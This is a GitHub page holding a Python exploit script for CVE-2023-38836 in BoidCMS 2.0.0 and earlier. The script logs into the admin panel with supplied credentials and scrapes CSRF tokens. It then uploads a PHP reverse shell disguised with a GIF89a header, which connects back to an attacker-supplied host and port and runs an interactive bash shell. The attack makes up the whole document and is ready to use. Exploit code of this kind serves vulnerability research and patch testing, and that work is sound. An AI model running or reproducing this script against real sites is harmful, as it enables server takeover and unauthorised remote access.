-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2023-38836.py
72 lines (65 loc) · 2.29 KB
/
CVE-2023-38836.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/python3
# Exploit Title: BoidCMS <= 2.0.0 - Authenticated file upload vulnerability
# Date: 08/21/2023
# Updated on: 07/05/2024
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: <= 2.0.0
# Tested on: Ubuntu
# CVE : CVE-2023-38836
import requests
import re
import argparse
parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
parser.add_argument("-u", "--url", help="website url")
parser.add_argument("-U", "--user", help="admin username")
parser.add_argument("-P", "--passwd", help="admin password")
parser.add_argument("-l", "--lhost", help="listening host")
parser.add_argument("-p", "--lport", help="listening port")
args = parser.parse_args()
argkeys = vars(args)
for i in ['url', 'user', 'passwd', 'lhost', 'lport']:
if argkeys[i]==None:
parser.print_help()
exit()
print(r"========================================")
print(r"======== CVE-2023-38836 Exploit ========")
print(r"======== @1337kid ========")
print("========================================\n")
base_url=args.url
with requests.Session() as s:
print(f"[+] Logging in with {args.user}:{args.passwd}")
req=s.get(f'{base_url}/admin')
token=re.findall('[a-z0-9]{64}',req.text)
form_login_data={
"username":args.user,
"password":args.passwd,
"login":"Login",
"token": token
}
req=s.post(f'{base_url}/admin',data=form_login_data)
if "Incorrect" in req.text:
print("[+] Login Failed")
exit()
print("[+] Logged in successfully")
#=========== File upload to RCE
print("[+] Uploading shell.php")
req=s.get(f'{base_url}/admin?page=media')
token=re.findall('[a-z0-9]{64}',req.text)
form_upld_data={
"token":token,
"upload":"Upload"
}
#==== php shell
php_code=['GIF89a;\n',f'<?php $sock = fsockopen("{args.lhost}", {args.lport}); proc_open("/bin/bash -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>']
with open('shell.php','w') as f: f.writelines(php_code)
#====
file = {'file' : open('shell.php','rb')}
s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
req=s.get(f'{base_url}/media/shell.php')
if req.status_code == '404':
print("[-] Upload failed")
exit()
print(f'[+] Uploaded to {base_url}/media/shell.php')
print(f'[+] Check the listener at {args.lhost}:{args.lport}')